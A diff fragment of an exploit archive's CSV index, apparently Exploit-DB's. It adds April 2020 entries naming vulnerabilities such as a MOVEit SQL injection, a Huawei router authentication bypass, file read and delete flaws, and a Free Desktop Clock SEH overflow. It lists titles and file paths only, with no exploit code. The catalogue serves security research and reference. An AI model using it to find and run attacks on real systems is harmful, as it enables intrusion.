Path",2020-04-10,MgThuraMoeMyint,local,windows, +48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42550,3 +42551,9 @@ id,file,description,date,author,type,platform,port 48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php, 48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware, 48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi, +48310,exploits/hardware/webapps/48310.txt,"Huawei HG630 2 Router - Authentication Bypass",2020-04-13,"Eslam Medhat",webapps,hardware, +48311,exploits/hardware/webapps/48311.py,"TVT NVMS 1000 - Directory Traversal",2020-04-13,"Mohin Paramasivam",webapps,hardware, +48312,exploits/php/webapps/48312.txt,"Webtateas 2.0 - Arbitrary File Read",2020-04-13,"China Banking and Insurance Information Technology Management Co.",webapps,php, +48313,exploits/java/webapps/48313.txt,"WSO2 3.1.0 - Arbitrary File Delete",2020-04-13,"Raki Ben Hamouda",webapps,java, +48315,exploits/php/webapps/48315.txt,"Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion",2020-04-13,"Daniel Monzón",webapps,php, +48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Noam Moshe",webapps,php,